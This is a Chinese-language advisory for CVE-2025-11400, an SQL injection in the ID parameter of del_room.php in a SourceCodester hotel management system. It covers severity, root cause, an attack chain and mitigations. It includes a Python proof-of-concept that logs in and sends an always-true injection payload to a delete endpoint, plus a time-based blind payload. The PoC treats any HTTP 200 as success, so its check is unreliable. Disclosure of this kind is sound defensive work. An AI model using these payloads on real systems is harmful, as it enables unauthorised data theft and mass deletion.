CVE-2025-11400：SourceCodester酒店管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11400

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Hotel and Lodge Management System

漏洞概述

CVE-2025-11400是SourceCodester Hotel and Lodge Management System 1.0版本中存在的一个SQL注入漏洞。该漏洞位于/del_room.php文件中，具体涉及对参数ID的操控。攻击者可以通过远程方式利用此漏洞，对目标系统发起SQL注入攻击。由于漏洞利用代码已经公开，攻击者可以较为容易地利用该漏洞对系统进行攻击。该漏洞的CVSS 3.1评分为6.3分，属于中危级别。攻击需要低权限认证，无需用户交互即可执行，成功利用后可对系统的机密性、完整性和可用性造成低程度的影响。SourceCodester Hotel and Lodge Management System是一款用于酒店和旅馆管理的Web应用程序，广泛应用于中小型住宿业务中。该系统的数据安全直接关系到客户信息、预订记录和财务数据等敏感信息，因此该漏洞的存在对使用该系统的企业构成潜在的安全威胁。漏洞已于2025年10月7日被公开披露，发现者通过VulDB平台提交了该漏洞报告。由于漏洞利用代码已经公开，建议相关用户尽快采取防护措施。

技术细节

该漏洞的根本原因在于/del_room.php文件未对用户输入的ID参数进行充分的过滤和参数化处理，导致攻击者可以将恶意SQL语句注入到数据库查询中。具体而言，当系统处理删除房间（del_room）操作时，会从用户请求中获取ID参数，并直接将其拼接到SQL查询语句中，而没有使用预编译语句（Prepared Statements）或参数化查询（Parameterized Queries）等安全防护机制。攻击者可以通过构造特殊的ID参数值，例如在数字参数后追加UNION SELECT语句或OR条件等方式，绕过原本的查询逻辑，执行任意的SQL命令。由于该漏洞需要低权限认证（PR:L），攻击者需要拥有一个有效的低权限账户才能利用此漏洞。但一旦认证成功，攻击者可以在无需用户交互（UI:N）的情况下通过网络远程（AV:N）发起攻击。攻击复杂度低（AC:L），攻击者无需特殊的技巧或条件即可成功利用。利用成功后，攻击者可以读取、修改或删除数据库中的敏感数据，甚至在某些情况下可能实现远程代码执行。漏洞的范围（Scope）未发生变化（S:U），影响仅限于受影响的组件本身。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统运行SourceCodester Hotel and Lodge Management System 1.0版本，并定位到存在漏洞的/del_room.php端点。

STEP 2

步骤2：获取低权限账户

攻击者通过注册、钓鱼或购买等方式获取一个有效的低权限用户账户，用于通过身份认证。

STEP 3

步骤3：构造SQL注入载荷

攻击者针对ID参数构造恶意SQL注入载荷，如'1 OR 1=1 -- '或UNION SELECT语句，用于绕过查询逻辑或提取数据库信息。

STEP 4

步骤4：发送恶意请求

攻击者通过已认证的会话向/del_room.php发送包含恶意ID参数的HTTP请求，触发SQL注入漏洞。

STEP 5

步骤5：数据提取或破坏

成功利用后，攻击者可以读取敏感数据（如用户凭证、财务信息）、修改或删除数据库记录，甚至在特定条件下实现权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11400 - SourceCodester Hotel and Lodge Management System SQL Injection PoC
# Vulnerable file: /del_room.php
# Vulnerable parameter: ID

import requests

# Target configuration
TARGET_URL = "http://target-site.com"
LOGIN_URL = f"{TARGET_URL}/login.php"
DEL_ROOM_URL = f"{TARGET_URL}/del_room.php"
USERNAME = "test_user"
PASSWORD = "test_password"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login to obtain a valid session (low privilege required)
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Exploit SQL injection via the ID parameter
# The ID parameter is directly concatenated into SQL query without sanitization
sql_payload = "1' OR '1'='1' -- "

params = {
    "ID": sql_payload
}

# Step 3: Send the malicious request
response = session.get(DEL_ROOM_URL, params=params)

# Step 4: Analyze the response for data extraction or error-based injection
if response.status_code == 200:
    print("[+] SQL Injection successful!")
    print(f"[+] Response length: {len(response.text)}")
    # Check for database error messages or extracted data
    if "error" in response.text.lower() or "sql" in response.text.lower():
        print("[+] Database error detected - injection confirmed")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Alternative: Time-based blind SQL injection payload
# sql_payload = "1' AND SLEEP(5) -- "
# Use this payload if the application does not return data directly

影响范围

SourceCodester Hotel and Lodge Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对/del_room.php文件中的ID参数进行紧急输入验证，确保其为整数类型；2）在Web服务器层面部署WAF规则，拦截常见的SQL注入载荷；3）限制/del_room.php端点的访问权限，仅允许管理员IP访问；4）监控数据库日志，关注异常的SQL查询行为；5）暂时禁用该功能或限制低权限用户对删除房间功能的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11400
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11400
3 Details https://www.cvedetails.com/cve/CVE-2025-11400/
4 VulDB https://vuldb.com/cve/CVE-2025-11400
5 Link https://github.com/bdrfly/cve/issues/3
6 Link https://vuldb.com/?ctiid.327337
7 Link https://vuldb.com/?id.327337
8 Link https://vuldb.com/?submit.665061
9 Link https://www.sourcecodester.com/